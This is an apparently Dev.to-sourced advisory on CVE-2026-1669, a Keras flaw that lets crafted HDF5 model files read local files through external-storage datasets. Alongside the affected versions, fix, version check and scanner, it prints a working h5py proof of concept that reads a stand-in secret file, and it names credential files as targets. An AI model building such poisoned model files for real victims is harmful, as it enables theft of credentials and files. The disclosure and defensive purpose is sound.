CVE-2026-1669: Model Poisoning: Turning Keras Weights into Weaponized File Readers
Source: Dev.to
Vulnerability ID: CVE-2026-1669
CVSS Score: 7.1
Published: 2026-02-18
A high‑severity arbitrary file read vulnerability in the Keras machine‑learning library allows attackers to exfiltrate sensitive local files (e.g., /etc/passwd or AWS credentials) by embedding “External Storage” links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
TL;DR
Keras blindly trusts HDF5 external datasets when loading models. An attacker can craft a .keras file where the model weights are pointers to local files on the victim’s machine. When the model is loaded, the contents of those files are read into memory as tensors.
⚠️ Exploit Status: Proof‑of‑Concept (PoC)
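The underlying mechanism is ordinary HDF5 "external storage," and it can be demonstrated with h5py alone, no Keras required. In the sketch below, the file names are hypothetical stand-ins: `secret.txt` plays the role of a sensitive victim file, and `model.weights.h5` plays the role of the attacker-crafted model archive.

```python
import os
import h5py

SECRET = "secret.txt"        # stand-in for e.g. /etc/passwd or AWS credentials
MODEL = "model.weights.h5"   # stand-in for the attacker-supplied model file

# A file the "attacker" wants to read on the victim's machine.
with open(SECRET, "wb") as f:
    f.write(b"user:x:0:0:root\n")
size = os.path.getsize(SECRET)

# Craft an HDF5 file whose dataset uses EXTERNAL storage: the bytes are
# not stored inside the .h5 container, only a pointer to SECRET is.
with h5py.File(MODEL, "w") as f:
    f.create_dataset(
        "kernel",
        shape=(size,),
        dtype="uint8",
        external=[(SECRET, 0, size)],  # (filename, offset, nbytes)
    )

# When a loader naively reads the dataset, HDF5 transparently pulls the
# bytes out of SECRET and hands them back as tensor data.
with h5py.File(MODEL, "r") as f:
    leaked = bytes(f["kernel"][:])

print(leaked)  # contents of SECRET, exfiltrated as "weights"
```

In the real attack, the crafted archive is shipped to the victim as a model; once loaded, the leaked bytes sit in the weight tensors, from which a malicious model pipeline could forward them to the attacker.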
Technical Details
- CWE ID: CWE‑73 (External Control of File Name or Path)
- CVSS v4.0: 7.1 (High)
- Attack Vector: Network / Local
- EPSS Score: 0.00039
- Exploit Maturity: PoC
- Affected Component: keras.src.saving.saving_lib
Affected Systems
- Keras 3.0.0
- Keras 3.1.0
- Keras 3.13.1
- Any Python application using Keras to load untrusted models
Version range: >= 3.0.0, < 3.13.2 (fixed in 3.13.2)
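The affected range above can be checked with a small dependency-free comparison. This is a hedged sketch that assumes plain numeric versions like 3.13.1; it does not handle pre-release suffixes.

```python
FIXED = "3.13.2"

def _parse(v: str) -> tuple:
    """Turn '3.13.1' into (3, 13, 1) for tuple comparison."""
    return tuple(int(part) for part in v.split("."))

def is_vulnerable(installed: str) -> bool:
    """True for Keras releases >= 3.0.0 and < 3.13.2 (CVE-2026-1669)."""
    return _parse("3.0.0") <= _parse(installed) < _parse(FIXED)

print(is_vulnerable("3.13.1"))  # True  (last affected release)
print(is_vulnerable("3.13.2"))  # False (first fixed release)
```

In practice you would feed `keras.__version__` into `is_vulnerable` at startup and refuse to load untrusted models on affected installs.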
Code Analysis
Commit: 8a37f9d – “Fix checking for external dataset in H5 file”
if dataset.external:
raise ValueError("Not allowed: H5 file Dataset with external links")
Exploit Details
- Researcher: Giuseppe Massaro – Original PoC demonstrating local file inclusion via HDF5 external storage.
Mitigation Strategies
- Input Validation – Reject or sanitize external dataset references.
- Sandboxing – Run model loading in a restricted environment with limited filesystem access.
- Dependency Management – Keep Keras up‑to‑date.
Remediation Steps
- Upgrade Keras to 3.13.2 or later.
- Audit existing model pipelines to ensure untrusted models are not loaded with high privileges.
- Implement pre‑loading checks (e.g., using h5dump) to scan for EXTERNAL_FILE headers in HDF5 files.
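As a programmatic alternative to h5dump, a pre-loading check can walk an HDF5 file with h5py and flag any dataset backed by external storage (h5py exposes this via the `Dataset.external` property). A minimal sketch, with hypothetical file and function names:

```python
import h5py

def external_datasets(path: str) -> list:
    """Return names of datasets in an HDF5 file that use external storage."""
    flagged = []

    def check(name, obj):
        # Dataset.external is None for inline storage, otherwise a list
        # of (filename, offset, size) tuples pointing outside the file.
        if isinstance(obj, h5py.Dataset) and obj.external:
            flagged.append(name)

    with h5py.File(path, "r") as f:
        f.visititems(check)
    return flagged

# Demo on a benign file: weights are stored inline, so nothing is flagged.
with h5py.File("clean.h5", "w") as f:
    f.create_dataset("kernel", data=[0, 1, 2, 3])

suspicious = external_datasets("clean.h5")
print(suspicious)  # []
```

Run this check before handing any untrusted model to a loader; a non-empty result means the file references data outside itself and should be rejected.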